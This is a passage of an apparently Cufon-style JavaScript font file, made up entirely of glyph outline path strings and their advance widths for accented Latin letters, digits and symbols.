,26,12,26,26v0,13,-12,26,-26,26","w":216},{"d":"249,-149v0,79,-53,159,-158,149r-91,0r24,-114r-23,0r7,-37r24,0r22,-106r95,0v65,0,100,37,100,108xm92,-220r-15,69r70,0r-7,37r-71,0r-16,77r56,0v77,0,95,-87,95,-113v2,-70,-46,-74,-112,-70","w":259},{"d":"-4,0r38,-186r39,0v-1,9,-7,20,-5,28v23,-45,122,-47,118,16v-4,52,-19,94,-27,142r-41,0r27,-132v0,-6,2,-27,-28,-27v-71,0,-62,99,-80,159r-41,0","w":206},{"d":"-4,0r38,-186r41,0r-38,186v-33,21,-48,35,-48,47v0,19,21,16,32,2r18,2v-12,21,-30,27,-49,27v-10,0,-30,-2,-30,-25v0,-25,33,-43,52,-53r-16,0xm41,-218r8,-39r41,0r-8,39r-41,0","w":86},{"d":"151,-114v0,-24,-12,-45,-41,-45v-46,0,-65,46,-65,88v0,28,14,44,42,44v42,0,64,-50,64,-87xm223,-257r-55,257r-39,0v1,-8,7,-19,5,-26v-16,24,-36,31,-58,31v-21,0,-72,-6,-72,-76v0,-60,37,-120,101,-120v26,-1,45,9,57,30r20,-96r41,0xm231,-222r8,-35r36,0v-8,30,-6,70,-47,72r2,-14v13,-2,19,-11,21,-23r-20,0","w":245},{"d":"46,-186r11,-56r40,0r-11,56r37,0r-7,30r-37,0r-22,112v-2,16,21,14,36,12r-7,30v-41,14,-88,-7,-68,-52r21,-102r-32,0r6,-30r33,0xm133,-222r7,-35r36,0v-8,30,-6,70,-47,72r3,-14v13,-2,18,-11,20,-23r-19,0","w":148},{"d":"37,0r-41,0r38,-186r41,0xm81,-253r40,0r-7,39r-40,0xm9,-253r40,0r-7,39r-40,0","w":86},{"d":"136,6r-39,0r-103,-269r39,0","w":126},{"d":"88,-27v42,0,63,-46,63,-84v0,-19,-13,-39,-43,-39v-42,0,-63,45,-63,75v0,27,13,48,43,48xm71,-221r37,-19v-10,-8,-20,-15,-31,-21r31,-18v12,7,23,15,32,24r39,-19r18,19r-39,19v63,72,38,241,-72,241v-51,0,-82,-29,-82,-81v0,-55,43,-106,107,-106v16,0,35,9,42,15v-5,-23,-14,-40,-26,-54r-38,19","w":213},{"d":"131,-61r25,-23r27,29v46,-44,52,-171,-35,-171v-101,0,-134,195,-21,195v10,0,20,-1,28,-5xm214,27r-31,-33v-82,37,-172,-15,-172,-100v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,59,-19,101,-49,126r27,29","w":273},{"d":"123,49r17,2v-12,21,-29,27,-48,27v-10,0,-30,-2,-30,-25v0,-21,23,-37,41,-47v-58,-1,-95,-47,-81,-114r32,-149r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,40,-25,95,-104,101v-27,18,-39,31,-39,42v0,19,21,16,32,2","w":266},{"d":"164,-72v0,-67,-132,-22,-132,-111v0,-46,35,-80,96,-80v54,0,97,22,95,82r-43,0v0,-32,-18,-45,-53,-45v-12,0,-50,3,-50,37v0,25,26,32,54,39v36,9,78,19,78,73v0,40,-29,83,-107,83v-60,0,-99,-27,-97,-91r43,0v-2,40,22,54,59,54v24,0,57,-11,57,-41","w":233},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm180,-311r39,0r-7,39r-39,0xm108,-311r39,0r-7,39r-39,0","w":246},{"d":"227,-201r-16,0r-43,201r-39,0v1,-8,7,-19,5,-26v-16,24,-36,31,-58,31v-21,0,-72,-6,-72,-76v0,-60,37,-120,101,-120v26,-1,45,9,57,30r8,-40r-72,0r7,-31r72,0r5,-25r41,0r-5,25r15,0xm151,-114v0,-24,-12,-45,-41,-45v-46,0,-65,46,-65,88v0,28,14,44,42,44v42,0,64,-50,64,-87","w":219},{"d":"184,-125r-41,0v1,-23,-14,-34,-36,-34v-41,0,-62,47,-62,83v0,65,80,60,89,12r41,0v-13,48,-46,69,-95,69v-49,0,-76,-33,-76,-80v0,-63,40,-116,106,-116v41,0,75,22,74,66"},{"d":"0,0r54,-257r45,0r-24,117r131,-117r60,0r-123,106r81,151r-52,0r-64,-123r-45,39r-18,84r-45,0","w":246},{"d":"58,9r151,-270r28,0r-150,270r-29,0xm26,-208r5,-21v22,0,44,-9,51,-25r26,0r-35,156r-33,0r25,-114v-11,3,-25,4,-39,4xm243,-62r13,-55r-54,55r41,0xm297,-62r-7,27r-20,0r-8,35r-34,0r9,-35r-71,0r6,-26r92,-96r35,0r-23,95r21,0","w":300},{"d":"32,0r-22,-186r43,0r11,134r62,-134r43,0r9,134r65,-134r43,0r-97,186r-43,0r-9,-136r-62,136r-43,0","w":280},{"d":"-12,69r69,-332r81,0r-7,32r-41,0r-55,267r40,0r-7,33r-80,0","w":106},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm144,-263r28,52r-30,0r-19,-32r-33,32r-33,0r49,-52r38,0"},{"d":"0,-68v0,-38,30,-66,61,-70v-63,-33,-20,-119,55,-119v39,0,75,17,75,63v0,33,-20,55,-46,60v24,9,37,32,37,61v0,45,-49,78,-94,78v-54,0,-88,-28,-88,-73xm41,-69v0,29,21,42,47,42v32,0,53,-21,53,-51v0,-28,-20,-40,-47,-40v-32,0,-53,17,-53,49xm69,-184v0,23,18,35,39,35v27,0,44,-13,44,-41v0,-25,-18,-35,-39,-35v-27,0,-44,17,-44,41"},{"d":"61,0r21,-102r-63,-155r47,0r44,117r90,-117r53,0r-127,159r-20,98r-45,0","w":226},{"d":"249,-149v0,79,-53,159,-158,149r-91,0r54,-257r95,0v65,0,100,37,100,108xm92,-220r-39,183r56,0v77,0,95,-87,95,-113v2,-70,-46,-74,-112,-70","w":259},{"d":"36,-218r8,-39r196,0r-7,37r-184,181r154,0r-8,39r-210,0r8,-37r181,-181r-138,0","w":226},{"d":"276,-129v0,81,-61,135,-132,135v-77,0,-132,-58,-132,-135v0,-81,61,-134,132,-134v71,0,132,53,132,134xm247,-129v0,-66,-45,-111,-103,-111v-58,0,-103,45,-103,111v0,61,39,112,103,112v58,0,103,-46,103,-112xm188,-103r24,0v-6,34,-31,56,-63,56v-46,0,-77,-36,-77,-82v0,-83,130,-109,140,-23r-24,0v-16,-55,-92,-30,-87,23v-8,56,76,81,87,26","w":288},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-25,0v-33,21,-47,35,-47,47v0,19,21,16,32,2r17,2v-12,21,-29,27,-48,27v-10,0,-30,-2,-30,-25v0,-25,33,-43,52,-53r-140,0","w":226},{"d":"-4,0r38,-186r41,0r-38,186r-41,0xm41,-218r8,-39r41,0r-8,39r-41,0","w":86},{"d":"0,0r54,-257r49,0r80,192r39,-192r45,0r-54,257r-49,0r-80,-191r-39,191r-45,0xm145,-313v27,0,58,35,68,0r21,0v-3,18,-16,43,-37,43v-24,0,-60,-36,-69,-1r-21,0v5,-20,15,-42,38,-42","w":259},{"d":"115,-54v0,-37,-98,-24,-98,-80v0,-41,39,-57,77,-57v40,0,73,13,72,59r-39,0v0,-19,-15,-27,-37,-27v-16,0,-32,6,-32,24v0,17,29,19,55,29v22,8,43,21,43,50v0,43,-41,61,-82,61v-43,0,-77,-14,-78,-65r39,0v-1,23,17,33,41,33v17,0,39,-6,39,-27","w":180},{"d":"46,-186r11,-56r40,0r-11,56r37,0r-7,30r-37,0r-22,112v-2,16,21,14,36,12r-7,30v-41,14,-88,-7,-68,-52r21,-102r-32,0r6,-30r33,0","w":119},{"d":"37,0r-41,0r38,-186r41,0xm88,-263r28,52r-30,0r-19,-32r-33,32r-33,0r49,-52r38,0","w":86},{"d":"-8,-5r38,-35v-12,-18,-19,-41,-19,-66v0,-108,71,-157,138,-157v34,0,62,11,82,32r38,-35r13,14r-39,36v12,18,18,40,18,65v0,108,-67,157,-136,157v-36,0,-64,-12,-83,-32r-37,35xm63,-72r138,-130v-11,-15,-29,-24,-53,-24v-72,0,-107,87,-85,154xm211,-185r-139,131v12,15,31,23,55,23v70,-1,102,-85,84,-154","w":273},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64"},{"d":"18,-154r7,-32r149,0r-7,30r-122,124r105,0r-7,32r-161,0r7,-30r123,-124r-94,0xm90,-253r40,0r-7,39r-39,0","w":173},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm147,-310r-47,0r47,38r32,0","w":246},{"d":"70,-122v23,0,56,24,77,25v14,0,23,-14,31,-25r13,31v-11,15,-23,31,-45,31v-36,0,-90,-50,-108,0r-13,-31v8,-15,21,-31,45,-31","w":216},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50xm139,-253r40,0r-7,39r-40,0xm67,-253r40,0r-7,39r-40,0"},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77xm138,-313v27,0,58,35,69,0r21,0v-3,18,-17,43,-38,43v-24,-1,-60,-36,-69,-1r-21,0v5,-20,15,-42,38,-42","w":273},{"d":"151,-114v0,-24,-12,-45,-41,-45v-46,0,-65,46,-65,88v0,28,14,44,42,44v42,0,64,-50,64,-87xm223,-257r-55,257r-39,0v1,-8,7,-19,5,-26v-16,24,-36,31,-58,31v-21,0,-72,-6,-72,-76v0,-60,37,-120,101,-120v26,-1,45,9,57,30r20,-96r41,0","w":219},{"d":"46,-186r11,-56r40,0r-11,56r37,0r-7,30r-37,0r-22,112v-2,16,21,14,36,12r-7,30v-41,14,-88,-7,-68,-52r21,-102r-32,0r6,-30r33,0xm17,48r8,-35r36,0v-8,30,-7,70,-48,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":119},{"d":"-19,0r114,-135r-60,-122r49,0r42,92r73,-92r53,0r-106,126r64,131r-48,0r-46,-100r-81,100r-54,0","w":233},{"d":"18,-154r7,-32r149,0r-7,30r-122,124r105,0r-7,32r-161,0r7,-30r123,-124r-94,0","w":173},{"d":"36,-218r8,-39r196,0r-7,37r-184,181r154,0r-8,39r-210,0r8,-37r181,-181r-138,0xm153,-310r47,0r-47,38r-32,0","w":226},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50xm138,-212r-30,0r-42,-51r45,0"},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0","w":226},{"d":"199,-146r0,37r-182,0r0,-37r182,0xm199,-73r0,37r-182,0r0,-37r182,0","w":216},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50"},{"d":"361,-39r-8,39r-177,0v1,-7,6,-17,4,-22v-15,20,-40,28,-66,28v-64,0,-98,-50,-98,-112v0,-81,52,-157,138,-157v28,0,52,8,70,31r6,-25r175,0r-8,39r-135,0r-14,67r123,0r-8,37r-122,0r-16,75r136,0xm122,-31v75,1,89,-86,89,-153v0,-8,-6,-42,-58,-42v-60,0,-92,56,-92,117v0,42,17,78,61,78","w":393},{"d":"194,-187v-1,86,-112,97,-149,150r128,0r-8,37r-175,0v8,-69,74,-100,127,-131v40,-14,54,-93,-5,-92v-32,0,-51,25,-53,58r-38,0v5,-55,36,-92,94,-92v44,0,79,22,79,70"},{"d":"0,0r11,-49r50,0v-11,42,-9,99,-66,102r4,-21v18,-3,25,-15,28,-32r-27,0xm28,-134r11,-48r50,0r-11,48r-50,0","w":100},{"d":"21,-218r7,-39r212,0r-8,39r-82,0r-45,218r-45,0r45,-218r-84,0xm116,-272r-28,-38r33,0r18,21r30,-21r35,0r-47,38r-41,0","w":213},{"d":"0,0r11,-49r50,0v-11,42,-9,99,-66,102r4,-21v18,-3,25,-15,28,-32r-27,0","w":100},{"d":"43,-6r-33,-180r44,0r20,136r70,-136r44,0r-107,192v-20,42,-44,79,-104,65r8,-34v17,5,33,3,42,-13xm127,-253r40,0r-7,39r-39,0xm55,-253r40,0r-7,39r-39,0","w":180},{"d":"122,-95r34,-162r45,0v-19,80,-21,154,-55,227v-14,30,-46,36,-73,36v-81,0,-76,-46,-68,-96r42,0v-8,28,-5,59,29,59v31,0,38,-25,46,-64","w":193},{"d":"37,0r-41,0r38,-186r41,0xm75,-212r-31,0r-42,-51r45,0","w":86},{"d":"58,0r-34,-257r46,0r25,203r107,-203r48,0r-141,257r-51,0","w":219},{"d":"90,-137r0,-45r36,0r0,45r73,0r0,37r-73,0r0,45r-36,0r0,-45r-73,0r0,-37r73,0xm17,0r0,-37r182,0r0,37r-182,0","w":216},{"d":"182,-12v-49,45,-121,-20,-170,18r-13,-31v27,-21,55,-47,41,-90r-32,0r5,-23r23,0v-25,-67,16,-125,84,-125v51,0,83,34,79,84r-40,0v4,-30,-11,-50,-41,-50v-54,0,-53,55,-41,91r54,0r-4,23r-46,0v8,41,-16,66,-37,83v26,-19,61,4,88,4v14,0,27,-9,37,-16"},{"d":"74,-27r18,-89v-33,-8,-67,-24,-67,-66v0,-55,42,-82,97,-81r6,-26r15,0r-5,27v42,5,63,30,62,72r-39,0v2,-22,-9,-37,-30,-41r-17,83v36,12,69,27,69,71v0,57,-47,86,-101,83r-6,31r-15,0r6,-31v-47,-6,-75,-34,-70,-84r41,0v-2,29,7,46,36,51xm107,-111r-18,85v28,0,53,-16,53,-47v0,-23,-16,-32,-35,-38xm100,-152r16,-79v-26,-1,-50,14,-50,46v0,22,15,28,34,33"},{"d":"30,6r-40,0r104,-269r39,0","w":126},{"d":"44,-156r0,-101r37,0r0,101r-37,0xm108,-156r0,-101r36,0r0,101r-36,0","w":159},{"d":"206,-186r-40,181v-12,57,-35,79,-94,79v-41,0,-79,-16,-80,-60r41,0v1,21,20,29,43,29v44,0,51,-33,56,-71v-36,53,-125,26,-125,-48v0,-56,34,-115,96,-115v27,0,48,10,58,36r6,-31r39,0xm48,-78v0,25,11,46,39,46v44,0,62,-45,62,-83v0,-27,-15,-44,-42,-44v-40,0,-59,47,-59,81","w":213},{"d":"8,0r10,-49r50,0r-10,49r-50,0xm127,0r11,-49r50,0r-11,49r-50,0xm247,0r11,-49r50,0r-11,49r-50,0","w":360},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm173,-224r-102,0r4,-23r102,0"},{"d":"44,0r-19,-257r46,0r10,197r89,-197r44,0r14,197r84,-197r46,0r-119,257r-46,0r-13,-197r-90,197r-46,0","w":333},{"d":"21,-218r7,-39r212,0r-8,39r-82,0r-45,218r-45,0r45,-218r-84,0","w":213},{"d":"0,0r11,-49r50,0r-11,49r-50,0","w":100},{"d":"114,-159v-41,0,-62,48,-62,85v0,28,14,47,44,47v41,0,61,-48,61,-85v0,-28,-13,-47,-43,-47xm-4,0r53,-257r41,0r-18,93v38,-53,126,-22,126,50v0,58,-33,119,-97,119v-29,0,-50,-9,-62,-36r-6,31r-37,0","w":219},{"d":"1,0r54,-257r45,0r-46,218r130,0r-8,39r-175,0xm108,-222r8,-35r36,0v-8,30,-7,70,-48,72r3,-14v13,-2,18,-11,20,-23r-19,0","w":206},{"d":"97,-212r-30,0r-43,-51r45,0","w":86},{"d":"-4,0r38,-186r39,0v-1,9,-7,20,-5,28v23,-45,122,-47,118,16v-4,52,-19,94,-27,142r-41,0r27,-132v0,-6,2,-27,-28,-27v-71,0,-62,99,-80,159r-41,0xm100,-212r-28,-51r30,0r19,32r33,-32r34,0r-50,51r-38,0","w":206},{"d":"69,-134v-36,0,-55,-18,-55,-51v0,-39,27,-72,71,-72v36,0,56,17,56,51v0,41,-26,72,-72,72xm71,-158v26,0,39,-27,39,-48v0,-15,-8,-28,-26,-28v-39,-1,-61,76,-13,76","w":128},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0","w":246},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79xm195,-310r28,39r-33,0r-18,-22r-30,22r-35,0r47,-39r41,0","w":266},{"d":"33,-215r8,-37r175,0r-8,39v-19,10,-122,139,-131,213r-45,0v23,-81,70,-154,130,-215r-129,0"},{"d":"-4,0r38,-186r39,0r-7,37v15,-26,40,-48,79,-41r-8,39v-86,-12,-83,83,-100,151r-41,0","w":133},{"d":"147,49r17,2v-12,21,-29,27,-48,27v-10,0,-30,-2,-30,-25v0,-23,26,-40,45,-50v-8,-3,-14,-12,-14,-22v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v85,0,75,28,66,71r-17,84v-1,13,15,8,23,6r-7,30v-31,5,-62,36,-60,47v4,18,22,16,33,2xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64"},{"d":"1,0r54,-257r45,0r-54,257r-45,0xm92,-310r47,0r-47,38r-32,0","w":100},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77xm184,-310r28,39r-32,0r-19,-22r-29,22r-36,0r48,-39r40,0","w":273},{"d":"0,0r54,-257r111,0v68,0,75,41,75,60v1,31,-22,55,-50,62v26,8,39,27,39,54v0,27,-17,81,-97,81r-132,0xm91,-220r-15,71r68,0v45,0,51,-27,51,-41v0,-10,-3,-30,-40,-30r-64,0xm70,-117r-17,80r64,0v15,0,63,2,67,-40v1,-12,0,-40,-46,-40r-68,0","w":253},{"d":"8,-78r7,-39r107,0r-8,39r-106,0","w":140},{"d":"93,-206v2,44,91,70,91,122v0,31,-20,54,-50,59v22,42,15,99,-64,99v-48,0,-70,-29,-70,-69r37,0v-1,21,14,36,36,36v16,0,32,-10,32,-34v0,-45,-95,-72,-95,-129v0,-28,23,-52,52,-54v-26,-43,15,-87,59,-87v50,0,70,20,70,66r-37,0v0,-19,-10,-34,-31,-34v-14,0,-30,9,-30,25xm113,-47v31,3,42,-38,20,-56v-19,-15,-32,-38,-55,-49v-29,-1,-36,35,-16,55"},{"d":"-9,-78r7,-39r181,0r-8,39r-180,0","w":180},{"d":"251,-171r-45,0v0,-36,-21,-55,-58,-55v-101,0,-134,195,-21,195v46,0,61,-41,66,-59r45,0v-15,65,-59,96,-113,96v-73,0,-114,-48,-114,-112v0,-108,71,-157,138,-157v61,0,104,33,102,92xm169,-310r47,0r-47,38r-32,0","w":259},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm106,-315r20,0v2,35,70,29,75,0r20,0v-3,57,-119,63,-115,0","w":246},{"d":"96,-253r39,0r-6,39r-40,0xm24,-253r39,0r-6,39r-40,0","w":86},{"d":"37,0r-41,0r38,-186r41,0xm114,-224r-102,0r5,-23r102,0","w":86},{"d":"-13,-81r7,-32v10,0,35,-6,39,-27r15,-74v13,-49,40,-51,90,-49r-7,32v-62,-10,-50,55,-62,96v-8,30,-35,34,-45,38v13,-2,34,13,29,40r-16,78v-3,16,21,16,38,15r-7,33v-41,4,-77,-4,-68,-50r15,-77v0,-18,-19,-23,-28,-23","w":106},{"d":"82,-91r-62,-63r31,-20r57,57r57,-57r31,20r-63,63r63,63r-31,20r-57,-58r-57,58r-31,-20","w":216},{"d":"180,-234r-40,0r-60,292r-29,0r37,-179v-34,1,-58,-21,-58,-55v0,-24,11,-81,98,-81r85,0r-65,315r-29,0","w":216},{"d":"110,-159v-44,0,-62,52,-62,88v0,27,12,44,42,44v40,0,58,-55,58,-88v0,-34,-19,-44,-38,-44xm183,-109r93,0v3,-30,-7,-50,-38,-50v-30,0,-47,22,-55,50xm314,-82r-136,0v-7,28,5,55,39,55v24,0,41,-11,47,-31r42,0v-15,63,-122,92,-156,29v-38,59,-144,41,-144,-45v0,-60,42,-117,106,-117v27,0,50,8,62,33v36,-59,144,-33,144,42v0,11,-1,22,-4,34","w":333},{"d":"62,-263r45,0r-42,51r-30,0","w":86},{"d":"0,0r54,-257r111,0v22,0,81,2,81,65v1,42,-24,62,-58,71v49,16,12,79,28,121r-48,0v-6,-24,3,-51,2,-76v-2,-48,-61,-25,-102,-30r-22,106r-46,0xm92,-220r-17,80v56,1,129,7,126,-47v-3,-49,-65,-29,-109,-33xm158,-310r47,0r-47,38r-32,0","w":253},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0xm128,-272r-28,-38r32,0r19,21r30,-21r35,0r-48,38r-40,0","w":226},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0xm143,-310r-47,0r47,38r32,0","w":226},{"d":"0,0r54,-257r175,0r-8,39r-130,0r-14,67r113,0r-8,37r-113,0r-24,114r-45,0","w":213},{"d":"117,-115r0,64r-24,0r0,-150v50,0,111,-8,111,43v0,27,-17,38,-39,41r42,66r-28,0r-38,-64r-24,0xm117,-136v28,-2,63,9,63,-23v0,-27,-36,-20,-63,-21r0,44xm276,-129v0,81,-61,135,-132,135v-77,0,-132,-58,-132,-135v0,-81,61,-134,132,-134v71,0,132,53,132,134xm247,-129v0,-66,-45,-111,-103,-111v-58,0,-103,45,-103,111v0,61,39,112,103,112v58,0,103,-46,103,-112","w":288},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0","w":206},{"d":"90,-109r0,-73r36,0r0,73r73,0r0,36r-73,0r0,73r-36,0r0,-73r-73,0r0,-36r73,0","w":216},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0xm141,-212r-30,0r-42,-51r45,0","w":206},{"d":"1,0r54,-257r62,0r28,196r112,-196r64,0r-53,257r-43,0r44,-206r-117,206r-35,0r-33,-206r-39,206r-44,0","w":320},{"d":"85,9r143,-270r26,0r-144,270r-25,0xm81,-115v-31,0,-51,-20,-51,-53v0,-41,22,-89,70,-89v31,0,52,20,52,53v0,43,-22,89,-71,89xm120,-206v0,-15,-5,-28,-20,-28v-32,0,-39,46,-39,68v0,17,6,28,20,28v31,0,39,-46,39,-68xm240,5v-31,0,-52,-20,-52,-53v0,-41,22,-89,70,-89v31,0,52,20,52,53v0,43,-21,89,-70,89xm279,-86v0,-15,-5,-28,-20,-28v-31,0,-39,46,-39,68v0,17,5,28,20,28v31,0,39,-46,39,-68","w":339},{"d":"141,-257r0,23r-46,0r0,125r-28,0r0,-125r-46,0r0,-23r120,0xm213,-257r40,105r41,-105r41,0r0,148r-27,0r-1,-116r-44,116r-20,0r-45,-116r0,116r-27,0r0,-148r42,0","w":356},{"d":"249,-149v0,79,-53,159,-158,149r-91,0r54,-257r95,0v65,0,100,37,100,108xm92,-220r-39,183r56,0v77,0,95,-87,95,-113v2,-70,-46,-74,-112,-70xm111,-272r-28,-38r32,0r19,21r29,-21r36,0r-48,38r-40,0","w":259},{"d":"-31,70r7,-14v15,7,42,11,46,-7v1,-23,-32,-5,-37,-19r27,-32r17,0r-20,24v20,-3,41,2,41,24v-2,37,-55,37,-81,24","w":86},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79xm163,-258v-18,0,-33,-16,-33,-34v0,-18,15,-33,33,-33v18,0,33,15,33,33v0,18,-15,34,-33,34xm143,-292v0,11,9,20,20,20v11,0,20,-9,20,-20v0,-11,-9,-20,-20,-20v-11,0,-20,9,-20,20","w":266},{"d":"-4,0r53,-257r41,0r-19,97v24,-43,120,-43,115,18v-4,52,-19,94,-27,142r-41,0r27,-132v0,-6,2,-27,-28,-27v-71,0,-62,99,-80,159r-41,0","w":206},{"d":"207,-186r-53,255r-41,0r19,-92v-38,51,-128,28,-128,-46v0,-62,35,-122,103,-122v24,0,47,10,56,33r6,-28r38,0xm45,-74v0,26,11,47,42,47v45,0,63,-47,63,-87v0,-26,-14,-45,-40,-45v-44,0,-65,47,-65,85","w":219},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79","w":266},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77xm154,-310r-47,0r46,38r33,0","w":273},{"d":"36,-156v12,-46,7,-96,67,-101r-5,21v-19,3,-25,14,-29,32r27,0r-10,48r-50,0","w":100},{"d":"36,-218r8,-39r196,0r-7,37r-184,181r154,0r-8,39r-210,0r8,-37r181,-181r-138,0xm123,-272r-28,-38r32,0r19,21r30,-21r35,0r-48,38r-40,0","w":226},{"d":"162,-39r0,-70r-145,0r0,-37r182,0r0,107r-37,0","w":216},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77xm182,-311r39,0r-6,39r-40,0xm110,-311r39,0r-6,39r-40,0","w":273},{"d":"199,-34r0,37r-182,-81r0,-26r182,-81r0,37r-134,57","w":216},{"d":"-4,0r53,-257r41,0r-53,257r-41,0","w":86},{"d":"43,-6r-33,-180r44,0r20,136r70,-136r44,0r-107,192v-20,42,-44,79,-104,65r8,-34v17,5,33,3,42,-13","w":180},{"d":"104,-208r10,-49r51,0v-13,45,-7,96,-67,101r4,-20v19,-3,25,-14,29,-32r-27,0xm33,-208r11,-49r50,0v-12,46,-7,96,-67,101r4,-20v19,-3,25,-14,29,-32r-27,0","w":159},{"d":"164,-72v0,-67,-132,-22,-132,-111v0,-46,35,-80,96,-80v54,0,97,22,95,82r-43,0v0,-32,-18,-45,-53,-45v-12,0,-50,3,-50,37v0,25,26,32,54,39v36,9,78,19,78,73v0,40,-29,83,-107,83v-60,0,-99,-27,-97,-91r43,0v-2,40,22,54,59,54v24,0,57,-11,57,-41xm145,-310r47,0r-47,38r-32,0","w":233},{"d":"0,0r54,-257r49,0r80,192r39,-192r45,0r-54,257r-49,0r-80,-191r-39,191r-45,0","w":259},{"d":"38,-208r10,-49r50,0v-12,46,-6,96,-66,101r4,-20v19,-3,25,-14,29,-32r-27,0","w":100},{"d":"252,-135r-29,135r-29,0r0,-27v-63,74,-183,14,-183,-79v0,-108,71,-157,138,-157v60,0,107,28,107,88r-45,0v-2,-35,-25,-51,-63,-51v-101,0,-134,195,-21,195v44,0,68,-29,78,-70r-71,0r7,-34r111,0xm109,-315r20,0v1,35,69,30,74,0r21,0v-3,57,-119,63,-115,0","w":273},{"d":"27,-156v12,-46,7,-96,67,-101r-5,21v-19,3,-25,14,-29,32r27,0r-10,48r-50,0xm98,-156v12,-46,7,-96,67,-101r-5,21v-19,3,-25,14,-29,32r27,0r-10,48r-50,0","w":159},{"d":"0,0r54,-257r49,0r80,192r39,-192r45,0r-54,257r-49,0r-80,-191r-39,191r-45,0xm174,-310r47,0r-47,38r-32,0","w":259},{"d":"27,-32r-20,-21r21,-22v-24,-24,-24,-78,0,-102r-21,-22r21,-21r20,20v24,-20,79,-22,102,0r21,-21r22,22r-20,21v23,25,22,79,-1,104r20,21r-20,20r-20,-21v-24,24,-79,24,-104,1xm100,-72v29,0,51,-25,51,-54v0,-28,-21,-54,-50,-54v-30,